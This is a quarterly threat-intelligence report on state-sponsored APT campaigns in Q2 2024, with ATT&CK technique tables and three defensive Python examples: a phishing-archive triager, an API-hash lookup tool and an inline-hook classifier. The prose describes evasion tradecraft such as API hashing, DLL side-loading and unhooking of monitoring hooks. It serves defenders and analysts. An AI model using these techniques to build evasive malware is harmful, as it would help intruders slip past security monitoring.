EXECUTIVE SUMMARY
In the second quarter of 2024, state-sponsored Advanced Persistent Threat (APT) groups from China, North Korea, Iran, and Russia remained highly active, and several introduced new tooling and tradecraft that challenged defenders worldwide.
Iranian state-sponsored actors were active across several regions and sectors. Void Manticore (Storm-842) conducted destructive attacks and data-leak operations against Israeli and Albanian organizations using custom wipers and web shells. MuddyWater focused on the Middle East, using spear-phishing and legitimate remote monitoring and management (RMM) tools to gain access to aviation and energy sector networks. APT42 (Mint Sandstorm) impersonated journalists to collect intelligence in the US, Europe, and the Middle East, deploying custom backdoors such as TAMECAT and NICECURL.
Russian threat actors focused on cyber espionage. APT28 (Forest Blizzard) exploited CVE-2022-38028 in the Windows Print Spooler with its GooseEgg tool and, in a separate campaign, targeted Polish government institutions with spear-phishing and DLL side-loading. Sandworm (APT44) deployed the Kapeka backdoor against targets in Eastern Europe in campaigns that included ransomware delivery and credential theft. FIN7 (Carbon Spider) broadened its targeting from retail and hospitality to the defense, insurance, and transportation sectors, delivering the Anunak backdoor through spear-phishing.
Chinese state-sponsored actors concentrated on espionage. RedJuliett targeted Taiwan and expanded into Hong Kong, South Korea, and the US, exploiting vulnerabilities in internet-facing network devices for initial access. APT41 (WICKED PANDA) continued operating the KEYPLUG backdoor on both Windows and Linux. Earth Freybug, a subset of APT41, combined DLL hijacking with API unhooking via the UNAPIMON malware to evade endpoint monitoring during reconnaissance.
North Korean actors intensified both espionage and revenue-generating operations. Kimsuky (Springtail) targeted South Korea with the new Gomir Linux backdoor and with social engineering, including ReconShark delivered over Facebook Messenger and the TRANSLATEXT Chrome extension. Moonstone Sleet (Storm-1789) pursued financial gain and espionage using fake companies, custom ransomware, and trojanized tools. The Lazarus Group used fake job lures to deliver the Kaolin RAT and exploited vulnerabilities to bypass security controls. Andariel targeted Korean companies with RATs such as Nestdoor and Dora RAT.
This report summarizes the APT activity observed in Q2 2024 and the measures it calls for: timely patching, user awareness, and monitoring for the tradecraft described in the sections below.
KEY TRENDS OBSERVED IN Q2 2024
- Iranian APT activities were driven by the motive to advance Iran’s intelligence objectives, particularly those aligned with the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO), by gathering valuable intelligence and influencing decision-making processes to further Iran’s strategic interests in the region.
- Alongside APT28, other threat actors like APT29, MISSION2025, and Stone Panda have also targeted CVE-2022-38028.
- There is a noticeable trend towards the diversification of attack techniques among North Korean APT groups. They are employing sophisticated methods, such as social engineering through platforms like Facebook and leveraging vulnerabilities in widely used applications and protocols.
- Chinese APT groups are exploiting vulnerabilities in firewalls, VPNs, and load balancers globally to initiate attacks. This strategic approach demonstrates their intent to target a wide range of organizations regardless of geographical boundaries, emphasizing a broad-spectrum targeting strategy.
- Chinese threat actors continue to refine their tactics, combining multi-stage intrusions with new evasion techniques and, in parallel, developing new malware strains. This dual approach lets them circumvent defenses and maintain persistence in compromised networks.
IRANIAN APT ACTIVITIES
Targeted Country
- Israel
- Albania
- Turkey
- Azerbaijan
- Jordan
- Saudi Arabia
- United States
- Europe
- Middle East
Targeted Technology
- Windows operating system
- PowerShell
- Microsoft SharePoint
- ScreenConnect
- Atera
- MeshCentral
- Remote Monitoring and Management (RMM) tools
Targeted Industries
- Government
- Finance
- Critical Infrastructure
- NGOs
- Media outlets
- Academia
- Legal services
- Activist groups
- Aviation
- Communications
- Energy
VOID MANTICORE AND SCARRED MANTICORE
Void Manticore (aka Storm-842) is an Iranian state-sponsored threat actor known for destructive attacks on Israeli organizations and for leaking stolen data through the online persona ‘Karma’ (sometimes written KarMa). Its targets include government, finance, and critical infrastructure, in line with Iran’s broader offensive strategy. The group favors simple, fast techniques aimed at causing rapid and visible damage, and it operates beyond Israel: in Albania it leaks stolen data under the persona ‘Homeland Justice’. In Israel, Void Manticore is known for the custom BiBi wiper, named after Israeli Prime Minister Benjamin Netanyahu. Initial access is typically gained by exploiting vulnerabilities in internet-facing web servers, such as CVE-2019-0604 in Microsoft SharePoint, after which the group deploys web shells, including the custom “Karma Shell”, which performs a range of tasks while presenting itself as an error page.
The group has also been seen uploading a custom executable, do.exe, which checks for Domain Admin credentials and installs a second web shell, reGeorg (a SOCKS tunnel), suggesting that initial access is sometimes handed off by another actor, most likely Scarred Manticore, a more sophisticated Iranian group. Once inside, Void Manticore moves laterally over Remote Desktop Protocol (RDP), maps the environment with Sysinternals AD Explorer, and establishes command-and-control (C2) channels with an OpenSSH client. With that control in place, it deploys destructive payloads: custom wipers that either corrupt specific files or destroy the system’s partition table. The CI Wiper, for instance, uses the legitimate ElRawDisk driver to wipe files, disks, and partitions, a technique seen in other Iran-linked wipers. The hand-off from Scarred Manticore gives Void Manticore access to high-value targets it could not reach on its own, and its attacks often carry politically charged messages, as the naming of the BiBi wiper shows.
MITRE ATT&CK Techniques
Tactic | ID | Technique / Sub-technique |
Execution | T1059 | Command and Scripting Interpreter |
Execution | T1059.003 | Windows Command Shell |
Execution | T1129 | Shared Modules |
Defense Evasion | T1202 | Indirect Command Execution |
Defense Evasion | T1027 | Obfuscated Files or Information |
Defense Evasion | T1036 | Masquerading |
Defense Evasion | T1070 | Indicator Removal |
Defense Evasion | T1070.001 | Clear Windows Event Logs |
Defense Evasion | T1070.004 | File Deletion |
Defense Evasion | T1497 | Virtualization/Sandbox Evasion |
Defense Evasion | T1564 | Hide Artifacts |
Defense Evasion | T1564.003 | Hidden Window |
Credential Access | T1003 | OS Credential Dumping |
Credential Access | T1539 | Steal Web Session Cookie |
Discovery | T1010 | Application Window Discovery |
Discovery | T1057 | Process Discovery |
Discovery | T1082 | System Information Discovery |
Discovery | T1083 | File and Directory Discovery |
Discovery | T1518.001 | Software Discovery: Security Software Discovery |
Collection | T1005 | Data from Local System |
Command and Control | T1071 | Application Layer Protocol |
Command and Control | T1071.001 | Web Protocols |
Impact | T1485 | Data Destruction |
Impact | T1490 | Inhibit System Recovery |
MUDDYWATER
Iran’s MuddyWater has been targeting Turkey, Azerbaijan, Jordan, Saudi Arabia, and Israel across a range of economic sectors. Active since 2017 and attributed to Iran’s Ministry of Intelligence and Security (MOIS), the group has concentrated on the Middle East, Israel in particular, using computer network exploitation (CNE) tradecraft built on spear-phishing and the exploitation of known vulnerabilities to reach the aviation, academic, communications, government, and energy sectors. MuddyWater makes heavy use of legitimate Remote Monitoring and Management (RMM) products such as ScreenConnect, Atera, MeshCentral, and Advanced Monitoring Agent. In recently observed campaigns, the intrusion starts with a phishing email sent from a legitimate but attacker-controlled domain and containing a link to a compressed archive; the archive holds an RMM installer, benign software in itself, which once installed gives the operator remote control of the host, including file transfer, keyboard and mouse input, and screen capture. Alongside the RMM tooling, the group uses a C/C++ injector that writes shellcode into processes such as msedge.exe, opera.exe, and powershell.exe through the classic Windows API sequence VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread.
MITRE ATT&CK Techniques
Tactic | ID | Technique / Sub-technique |
Initial Access | T1566.002 | Phishing: Spearphishing Link |
Execution | T1203 | Exploitation for Client Execution |
Privilege Escalation | T1548 | Abuse Elevation Control Mechanism |
Defense Evasion | T1036 | Masquerading |
Defense Evasion | T1548 | Abuse Elevation Control Mechanism |
Defense Evasion | T1562 | Impair Defenses |
Defense Evasion | T1562.001 | Disable or Modify Tools |
Defense Evasion | T1564 | Hide Artifacts |
Defense Evasion | T1564.003 | Hidden Window |
Credential Access | T1003 | OS Credential Dumping |
Credential Access | T1552 | Unsecured Credentials |
Credential Access | T1552.001 | Credentials In Files |
Credential Access | T1555 | Credentials from Password Stores |
Credential Access | T1555.003 | Credentials from Web Browsers |
Discovery | T1012 | Query Registry |
Discovery | T1057 | Process Discovery |
Discovery | T1082 | System Information Discovery |
Collection | T1005 | Data from Local System |
Command and Control | T1071 | Application Layer Protocol |
Command and Control | T1573 | Encrypted Channel |
Impact | T1485 | Data Destruction |
APT42, MINT SANDSTORM
APT42, an Iranian state-linked cyber espionage group also tracked as Mint Sandstorm, has been running a social engineering campaign in which operators impersonate journalists to gain the trust of, and then access to, high-profile experts on Middle Eastern affairs. Its operations span the United States, Israel, Europe, and the Middle East and target NGOs, media outlets, academia, legal services, and activist groups. The first phase builds a credible journalist persona and a rapport with the target; that trust is then used to obtain network access. APT42 deploys custom backdoors such as TAMECAT, a PowerShell toehold for executing arbitrary commands, and NICECURL, a VBScript backdoor that downloads and executes additional modules for data collection and command execution. The activity serves Iran’s intelligence objectives, particularly those of the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO).
MITRE ATT&CK Techniques
Tactic | ID | Technique / Sub-technique |
Execution | T1203 | Exploitation for Client Execution |
Defense Evasion | T1036 | Masquerading |
Defense Evasion | T1564 | Hide Artifacts |
Defense Evasion | T1564.003 | Hidden Window |
Credential Access | T1003 | OS Credential Dumping |
Credential Access | T1552 | Unsecured Credentials |
Credential Access | T1552.001 | Credentials In Files |
Credential Access | T1555 | Credentials from Password Stores |
Credential Access | T1555.003 | Credentials from Web Browsers |
Discovery | T1012 | Query Registry |
Discovery | T1082 | System Information Discovery |
Collection | T1005 | Data from Local System |
Command and Control | T1071 | Application Layer Protocol |
Command and Control | T1573 | Encrypted Channel |
Impact | T1485 | Data Destruction |
RUSSIAN APT ACTIVITIES
Targeted Country
- United States
- Europe
- Poland
- Estonia
- Ukraine
Targeted Technology
- Windows Print Spooler service
- Windows
Targeted Industries
- Government
- Automotive Manufacturer
APT28
Forest Blizzard, also tracked as STRONTIUM and APT28, is a Russian state threat actor that conducts strategic intelligence collection in support of Russian government foreign policy. It uses GooseEgg, a custom post-compromise tool, to elevate privileges on compromised systems, steal credentials, and support follow-on activity such as remote code execution, backdoor installation, and lateral movement.
The group exploits CVE-2022-38028 (CVSS 7.8), a privilege escalation flaw in the Windows Print Spooler service. GooseEgg modifies a JavaScript constraints file and executes it with SYSTEM-level permissions, which lets the operator launch arbitrary executables or DLLs with elevated privileges; the tool also manipulates registry keys, creates custom protocol handlers, and hijacks symbolic links to redirect system processes into attacker-controlled code. Historically, Forest Blizzard has targeted government, energy, transportation, NGO, media, IT, sports, and education organizations, primarily in the United States and Europe. The risks include data breaches, credential theft, unauthorized access, and the compromise of sensitive information in support of Russian espionage. Organizations should apply the security update for CVE-2022-38028 and implement defensive measures against this actor. Alongside APT28, other actors including APT29, MISSION2025, and Stone Panda have reportedly targeted CVE-2022-38028, and the Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.
MITRE ATT&CK Techniques
Tactic | ID | Technique / Sub-technique |
Execution | T1059 | Command and Scripting Interpreter |
Execution | T1129 | Shared Modules |
Defense Evasion | T1027 | Obfuscated Files or Information |
Defense Evasion | T1112 | Modify Registry |
Discovery | T1033 | System Owner/User Discovery |
Discovery | T1082 | System Information Discovery |
Discovery | T1083 | File and Directory Discovery |
Discovery | T1087 | Account Discovery |
Command and Control | T1071 | Application Layer Protocol |
A separate cyber-espionage campaign attributed to APT28, the group linked to Russia’s GRU, has been targeting Polish government institutions. It relies on DLL side-loading and on scripts that download and run additional payloads. The intrusion begins with carefully crafted spear-phishing emails, personalized for staff within government agencies, that carry links to pages on widely used free services such as run[.]mocky[.]io and webhook[.]site; these serve as the initial delivery points for the malware and let the traffic blend in with legitimate use of those services. A victim who follows the link downloads a ZIP archive whose contents are disguised as images: a copy of the Windows Calculator binary renamed to look like a JPG, together with a hidden batch script and a hidden DLL. When the renamed Calculator is launched, it side-loads the malicious DLL placed beside it, so the attacker’s code runs under a legitimate, signed executable and is less likely to be flagged by security software. The multi-stage chain and the social engineering around it are designed to maintain the illusion of legitimacy for as long as possible.
MITRE ATT&CK Techniques
Tactic | ID | Technique / Sub-technique |
Execution | T1059 | Command and Scripting Interpreter |
Defense Evasion | T1036 | Masquerading |
Defense Evasion | T1202 | Indirect Command Execution |
Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools |
Defense Evasion | T1564 | Hide Artifacts |
Defense Evasion | T1564.001 | Hidden Files and Directories |
Defense Evasion | T1564.003 | Hidden Window |
Defense Evasion | T1070 | Indicator Removal |
Credential Access | T1056 | Input Capture |
Credential Access | T1539 | Steal Web Session Cookie |
Discovery | T1082 | System Information Discovery |
Discovery | T1497 | Virtualization/Sandbox Evasion |
Collection | T1056 | Input Capture |
Command and Control | T1071 | Application Layer Protocol |
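The lure archive described above (a renamed PE posing as an image plus hidden helper files) can be triaged mechanically. The following is an added example, not code from the original report or from any vendor: it inspects a ZIP without extracting it, compares each member's extension against its leading bytes, and flags hidden batch and DLL helpers. The sample archive is constructed in memory; the file names in it are made up and not indicators from the campaign.

```python
import io
import os
import zipfile

# Leading bytes of common image formats, and of Windows PE files.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
PE_MAGIC = b"MZ"
# Extensions of the helper files a side-loading lure relies on.
HELPER_EXTS = {".bat", ".cmd", ".dll", ".vbs", ".js", ".hta"}
DOS_HIDDEN = 0x02  # MS-DOS attribute byte lives in the low bits of external_attr


def is_hidden(info: zipfile.ZipInfo) -> bool:
    """True when the member carries the MS-DOS 'hidden' attribute."""
    return bool(info.external_attr & DOS_HIDDEN)


def triage_archive(data: bytes) -> list:
    """Return one finding per suspicious member of the ZIP held in `data`."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            ext = os.path.splitext(info.filename)[1].lower()
            with zf.open(info) as fh:
                head = fh.read(16)
            reasons = []
            if ext in IMAGE_MAGIC:
                if head.startswith(PE_MAGIC):
                    reasons.append("PE executable disguised as image")
                elif not any(head.startswith(m) for m in IMAGE_MAGIC[ext]):
                    reasons.append("content does not match image extension")
            if ext in HELPER_EXTS:
                reasons.append(f"script/library helper ({ext})")
            if reasons and is_hidden(info):
                reasons.append("hidden attribute set")
            if reasons:
                findings.append({"name": info.filename, "reasons": reasons})
    return findings


def build_sample() -> bytes:
    """Constructed lure archive (not a real sample): a PE renamed to .jpg plus a
    hidden batch file and a hidden DLL; 'real.png' is a benign control."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("photo.jpg", PE_MAGIC + b"\x90\x00" * 40)  # fake PE header only
        for name, body in (("update.bat", b"@echo off\r\nstart photo.jpg\r\n"),
                           ("helper.dll", PE_MAGIC + b"\x00" * 80)):
            zi = zipfile.ZipInfo(name)
            zi.external_attr = DOS_HIDDEN
            zf.writestr(zi, body)
        zf.writestr("real.png", IMAGE_MAGIC[".png"][0] + b"\x00" * 20)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_archive(build_sample()):
        print(finding["name"], "->", "; ".join(finding["reasons"]))
```

The hidden-attribute check only works on archives produced on Windows, where the DOS attribute byte is populated; archives built on other platforms need a different heuristic, such as a leading dot in the file name.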
APT44
A previously undocumented backdoor called Kapeka has been observed sporadically since mid-2022 in attacks on Eastern European targets, including Estonia and Ukraine. Researchers attribute it to the Russia-linked Sandworm group (aka APT44 or Seashell Blizzard); Microsoft tracks the same malware as KnuckleTouch. Kapeka is a flexible backdoor that serves as an early-stage toolkit for its operators and provides long-term access to victim systems. Its dropper launches the backdoor component on the infected host, configures persistence, and then deletes itself; persistence is set up either as a scheduled task or as an autorun registry key, depending on whether the dropper is running with SYSTEM privileges. Microsoft has noted that Kapeka appears in campaigns that distribute ransomware, and that it can steal credentials and data, carry out destructive actions, and grant remote access to the device. The backdoor itself is a Windows DLL written in C++ that masquerades as a Microsoft Word add-in. It carries an embedded command-and-control (C2) configuration that tells it which actor-controlled server to contact and how often to poll for commands; it gathers information about the compromised host, processes instructions on multiple threads, and exfiltrates results to the C2 server. Messages are exchanged as JSON, and the operator can update the C2 configuration on the fly. Its capabilities include reading and writing files, launching payloads, executing shell commands, and upgrading or uninstalling itself.
MITRE ATT&CK Techniques
Tactic | ID | Technique / Sub-technique |
Execution | T1059 | Command and Scripting Interpreter |
Execution | T1129 | Shared Modules |
Defense Evasion | T1027 | Obfuscated Files or Information |
Defense Evasion | T1027.005 | Indicator Removal from Tools |
Defense Evasion | T1112 | Modify Registry |
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
Defense Evasion | T1218.011 | System Binary Proxy Execution: Rundll32 |
Defense Evasion | T1222 | File and Directory Permissions Modification |
Defense Evasion | T1497 | Virtualization/Sandbox Evasion |
Discovery | T1012 | Query Registry |
Discovery | T1033 | System Owner/User Discovery |
Discovery | T1057 | Process Discovery |
Discovery | T1082 | System Information Discovery |
Discovery | T1083 | File and Directory Discovery |
Discovery | T1087 | Account Discovery |
Discovery | T1518 | Software Discovery |
Discovery | T1518.001 | Security Software Discovery |
Discovery | T1614 | System Location Discovery |
Collection | T1560 | Archive Collected Data |
Command and Control | T1071 | Application Layer Protocol |
Command and Control | T1573 | Encrypted Channel |
FIN7
FIN7, a Russian advanced persistent threat (APT) group also known as Carbon Spider, ELBRUS, and Sangria Tempest, recently ran a spear-phishing campaign against a US automotive manufacturer. The attackers singled out IT staff with high-level administrative rights and lured them with a malicious URL posing as an IP scanning tool. Following the link led to deployment of the Anunak backdoor, which gave FIN7 an initial foothold; the group then relied on living-off-the-land binaries, scripts, and libraries (LOLBAS) to avoid dropping additional tooling. Historically, FIN7 targeted the US retail, hospitality, and restaurant sectors, but it is now expanding into defense, insurance, and transportation. Researchers assess that FIN7 is pursuing larger organizations in anticipation of higher ransom payments.
MITRE ATT&CK Techniques
Tactic | ID | Technique / Sub-technique |
Initial Access | T1566.002 | Phishing: Spearphishing Link |
Execution | T1204.002 | User Execution: Malicious File |
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
Execution | T1569.002 | System Services: Service Execution |
Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task |
Persistence | T1543.003 | Create or Modify System Process: Windows Service |
Defense Evasion | T1027 | Obfuscated Files or Information |
Defense Evasion | T1564.001 | Hide Artifacts: Hidden Files and Directories |
Defense Evasion | T1222.001 | File and Directory Permissions Modification: Windows File and Directory Permissions Modification |
Defense Evasion | T1562.004 | Impair Defenses: Disable or Modify System Firewall |
Discovery | T1124 | System Time Discovery |
Discovery | T1057 | Process Discovery |
Discovery | T1087.002 | Account Discovery: Domain Account |
Discovery | T1069.002 | Permission Groups Discovery: Domain Groups |
Discovery | T1082 | System Information Discovery |
Discovery | T1033 | System Owner/User Discovery |
Lateral Movement | T1021.004 | Remote Services: SSH |
Command and Control | T1571 | Non-Standard Port |
Command and Control | T1090 | Proxy |
Resource Development | T1608.005 | Stage Capabilities: Link Target |
Resource Development | T1583.001 | Acquire Infrastructure: Domains |
CHINESE APT ACTIVITIES
Targeted Country
- Taiwan
- Hong Kong
- South Korea
- Laos
- United States
- Rwanda
- Kenya
- Djibouti
- Italy
Targeted Industries
- Aerospace
- Education
- Semiconductor
- Manufacturing
- Technology
- Government
Targeted Technology
- Windows
- Linux
REDJULIETT
In Q2 2024, researchers reported that a likely Chinese state-sponsored group known as RedJuliett had, between November 2023 and April 2024, exploited known vulnerabilities in network edge devices such as firewalls, VPNs, and load balancers to gain initial access. Operating from Fuzhou, China, RedJuliett persistently targeted Taiwan, most likely to support Beijing’s intelligence collection on Taiwan’s economic and diplomatic relations and its critical technology development. The group also compromised organizations in Hong Kong, Malaysia, Laos, South Korea, the United States, Djibouti, Kenya, and Rwanda. Beyond the edge-device exploits, RedJuliett used SQL injection and directory traversal against web and database applications. Inside victim networks it set up a SoftEther VPN bridge or client for persistent access, ran web application security scanners for reconnaissance and exploitation, deployed open-source web shells, and exploited a Linux elevation-of-privilege vulnerability. Its infrastructure mixes leased servers under the group’s control with compromised hosts belonging to Taiwanese universities. The activity aligns with Beijing’s objectives of gathering intelligence on Taiwan’s economic policy, trade, and diplomatic relations, and the group’s repeated targeting of critical technology companies underlines the strategic value of that sector to Chinese state-sponsored actors.
MITRE ATT&CK Techniques
Tactic | ID | Technique / Sub-technique |
Resource Development | T1583.003 | Acquire Infrastructure: Virtual Private Server |
Resource Development | T1584 | Compromise Infrastructure |
Reconnaissance | T1595.002 | Active Scanning: Vulnerability Scanning |
Initial Access | T1190 | Exploit Public-Facing Application |
Persistence | T1133 | External Remote Services |
Persistence | T1505.003 | Server Software Component: Web Shell |
Privilege Escalation | T1068 | Exploitation for Privilege Escalation |
APT41
APT41, also known as WICKED PANDA, is a sophisticated Chinese state-backed group known for both cyber espionage and financially motivated operations. Its latest campaign deploys KEYPLUG, a modular backdoor written in C++ that has been active since at least June 2021 and exists in Windows and Linux variants. KEYPLUG supports several command-and-control (C2) transports, including HTTP, TCP, KCP over UDP, and WebSocket Secure (WSS), and has remained undetected in environments running advanced detection solutions. The Windows variant is delivered through a .NET loader that decrypts and executes shellcode, which in turn unpacks the final payload; the Linux variant is more complex still. Both variants resolve Windows or libc APIs through custom hashing algorithms rather than plaintext import names and include further techniques to evade security controls, reflecting the group’s advanced and persistent capabilities.
MITRE ATT&CK Techniques
Tactic | ID | Technique / Sub-technique |
Initial Access | T1566 | Phishing |
Execution | T1047 | Windows Management Instrumentation |
Defense Evasion | T1070.006 | Indicator Removal: Timestomp |
Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
Credential Access | T1056.004 | Input Capture: Credential API Hooking |
Discovery | T1010 | Application Window Discovery |
Discovery | T1057 | Process Discovery |
Discovery | T1082 | System Information Discovery |
Discovery | T1497 | Virtualization/Sandbox Evasion |
Discovery | T1518.001 | Software Discovery: Security Software Discovery |
Collection | T1056.004 | Input Capture: Credential API Hooking |
Command and Control | T1071 | Application Layer Protocol |
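API hashing, mentioned above as one of KEYPLUG's evasion techniques, replaces the import table and plaintext API strings with a hash per function: at run time the malware walks a DLL's export table, hashes each name, and calls the export whose hash matches the stored value. The following added example (not KEYPLUG's code, and not from the original report) shows both sides: the run-time resolution the malware performs, and the precomputed hash-to-name table an analyst builds to label hashes found in a sample. The ROR-13 hash used here is a widely seen illustrative algorithm; the page says only that KEYPLUG's algorithms are custom, so a real analysis would swap in a reimplementation of the sample's own routine. The export table is a constructed stand-in with real API names and made-up addresses.

```python
from typing import Callable, Dict, Iterable, Optional, Tuple

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def ror13_hash(name: str) -> int:
    """ROR-13 string hash over the ASCII export name. Illustrative only: KEYPLUG's
    real hash is custom; replace this function when analysing an actual sample."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & MASK32
    return h


def resolve_by_hash(exports: Dict[str, int], wanted: int,
                    hasher: Callable[[str], int] = ror13_hash) -> Optional[Tuple[str, int]]:
    """What the malware does at run time: hash each export name until one matches
    the stored value, then return that (name, address)."""
    for name, address in exports.items():
        if hasher(name) == wanted:
            return name, address
    return None


def build_lookup(names: Iterable[str],
                 hasher: Callable[[str], int] = ror13_hash) -> Dict[int, str]:
    """What the analyst does: precompute hash -> name for every export of the DLLs
    of interest, so hashes pulled out of a sample can be labelled directly."""
    return {hasher(n): n for n in names}


def label_hashes(hashes: Iterable[int], lookup: Dict[int, str]) -> Dict[int, str]:
    """Map each hash found in a sample to an API name, or 'unknown'."""
    return {h: lookup.get(h, "unknown") for h in hashes}


# Constructed stand-in for a kernel32 export table: real API names, made-up addresses.
KERNEL32_EXPORTS = {
    "VirtualAllocEx": 0x7FF8_0001_1000,
    "WriteProcessMemory": 0x7FF8_0001_2000,
    "CreateRemoteThread": 0x7FF8_0001_3000,
    "LoadLibraryA": 0x7FF8_0001_4000,
    "GetProcAddress": 0x7FF8_0001_5000,
}


if __name__ == "__main__":
    stored = ror13_hash("CreateRemoteThread")  # what the binary embeds instead of the string
    print(hex(stored), resolve_by_hash(KERNEL32_EXPORTS, stored))
    table = build_lookup(KERNEL32_EXPORTS)
    print(label_hashes([stored, 0xDEADBEEF], table))
```

Because `build_lookup` is parameterized on the hash function, the same table builder serves any sample once its algorithm has been reimplemented; feeding it the export lists of kernel32, ntdll, advapi32 and ws2_32 covers most of what a Windows backdoor resolves.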
EARTH FREYBUG
At the beginning of Q2 2024, researchers observed Earth Freybug, a subset of APT41, using DLL hijacking and API unhooking to evade detection with a newly discovered malware named UNAPIMON, whose purpose is to stop child processes from being monitored. The chain starts with a legitimate process, vmtoolsd.exe, being abused to create a scheduled task that runs a reconnaissance batch file; this file collects system information and registers a second task that deploys a backdoor through DLL side-loading via the SessionEnv service. UNAPIMON, a DLL, hooks CreateProcessW. Whenever the host process creates a child, UNAPIMON has it started in a suspended state, loads a clean copy of each relevant system DLL from disk, compares it with the copy mapped in the child, and overwrites any API prologues that differ, which removes the inline hooks that monitoring products rely on. Only then is the child allowed to run, so its activity goes unobserved. The technique is simple but effective, and illustrates the group’s evolving tradecraft.
MITRE ATT&CK Techniques
Tactic | ID | Technique / Sub-technique |
Execution | T1053 | Scheduled Task/Job |
Persistence | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools |
Discovery | T1082 | System Information Discovery |
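The comparison UNAPIMON performs (on-disk DLL bytes versus the in-memory copy) is the same one a defender can run in reverse, both to find inline hooks and to notice when a product's own hooks have been torn out. The following added example is not UNAPIMON's code or the report's: it classifies the common x64 inline-hook patterns by comparing a clean prologue with the live one, computes where a 5-byte relative jmp leads, and shows how a monitoring product can detect unhooking by re-checking that its patches are still present. The byte sequences and function names are constructed for illustration and are not taken from a real ntdll.

```python
from typing import Dict, List, Optional

# Constructed x64 prologues (not bytes from a real ntdll). CLEAN_STUB mimics a
# syscall stub (mov r10, rcx; mov eax, N; syscall; ret). HOOKED_STUB is the same
# function after a monitoring product planted a 5-byte relative jmp over it; a
# real hook would also save the overwritten bytes in a trampoline.
CLEAN_STUB = bytes.fromhex("4c8bd1b8c10000000f05c3")
HOOKED_STUB = b"\xE9" + (0x1000).to_bytes(4, "little") + CLEAN_STUB[5:]


def classify_patch(clean: bytes, live: bytes) -> str:
    """Compare a function's on-disk prologue (`clean`) with the bytes currently
    mapped in a process (`live`) and name the kind of patch, if any."""
    if clean == live:
        return "clean"
    if len(live) >= 5 and live[0] == 0xE9:
        return "inline hook: jmp rel32"
    if live[:2] == b"\xFF\x25":
        return "inline hook: jmp [rip+disp32]"
    if live[:2] == b"\x48\xB8" and live[10:12] == b"\xFF\xE0":
        return "inline hook: mov rax, imm64; jmp rax"
    return "modified: unrecognised patch"


def jmp_rel32_target(func_va: int, live: bytes) -> Optional[int]:
    """Destination of an E9 jmp placed at `func_va`; the displacement is relative
    to the address of the following instruction (func_va + 5)."""
    if len(live) < 5 or live[0] != 0xE9:
        return None
    disp = int.from_bytes(live[1:5], "little", signed=True)
    return func_va + 5 + disp


def scan_module(clean: Dict[str, bytes], live: Dict[str, bytes]) -> Dict[str, str]:
    """Classify every exported function of one module at once. This is the loop
    UNAPIMON runs before overwriting the differing bytes with the clean copy."""
    return {name: classify_patch(clean[name], live.get(name, b"")) for name in clean}


def hooks_removed(expected: Dict[str, bytes], live: Dict[str, bytes]) -> List[str]:
    """Defender's mirror image: a product that planted hooks can detect unhooking
    by checking that its own patched prologues are still in place."""
    return [name for name, patched in expected.items() if live.get(name) != patched]


if __name__ == "__main__":
    print(classify_patch(CLEAN_STUB, HOOKED_STUB))
    print(hex(jmp_rel32_target(0x7FF800001000, HOOKED_STUB)))
    print(hooks_removed({"NtCreateThreadEx": HOOKED_STUB}, {"NtCreateThreadEx": CLEAN_STUB}))
```

In practice the `live` bytes come from reading the target's memory and the `clean` bytes from mapping the DLL file from disk; the classification logic is the same regardless of how the bytes were obtained.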
ADDITIONAL OBSERVATIONS
The Chinese APT group ChamelGang has been deploying ransomware within its cyber espionage campaigns against critical sectors such as healthcare and government. In 2022 it attacked major institutions in India and Brazil; in 2023 it targeted a government organization in East Asia and an aviation organization in the Indian subcontinent. ChamelGang uses the CatB ransomware, obfuscated loaders such as BeaconLoader, and Cobalt Strike beacons, alongside publicly available privilege escalation tools and proxies for routing malicious traffic. Its tradecraft includes obfuscation, exploitation of remote services, and masquerading malware components to evade detection.
NORTH KOREA APT ACTIVITIES
Targeted Country
- South Korea
- Asia
Targeted Technology
- Software
- Windows
- Linux
- Applications
Targeted Industries
- Government
- Software
- Education
- Manufacturing
- Construction
KIMSUKY
In Q2 2024, researchers identified that the North Korean cyber espionage group Springtail (also known as Kimsuky) has been deploying a new Linux backdoor called Gomir in a campaign against South Korean organizations. Gomir is structurally similar to the group’s GoBear Windows backdoor and shares much of its code. Springtail has a history of targeting South Korean public sector organizations with spear-phishing, and it has exploited improperly configured DNS DMARC policies, which allow spoofed mail from the impersonated domains to be delivered. In this campaign the group used trojanized software installation packages to distribute a new malware family, Troll Stealer, which steals files, screenshots, browser data, and system information, including the GPKI certificate folder used by South Korean government personnel. On execution, Gomir establishes persistence either as a system service or as a crontab entry, depending on its privilege level, and communicates with its command-and-control server over HTTP POST requests; supported commands include running shell commands, collecting system information, and exfiltrating files. The campaign shows a heavy reliance on supply-chain-style delivery, using trojanized and fake software installers to maximize infections among the targeted South Korean organizations.
MITRE ATT&CK Techniques
Tactic | ID | Technique / Sub-technique |
Defense Evasion | T1027 | Obfuscated Files or Information |
Defense Evasion | T1027.005 | Obfuscated Files or Information: Indicator Removal from Tools |
Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
Discovery | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
Discovery | T1518.001 | Software Discovery: Security Software Discovery |
Command and Control | T1071 | Application Layer Protocol |
Command and Control | T1095 | Non-Application Layer Protocol |
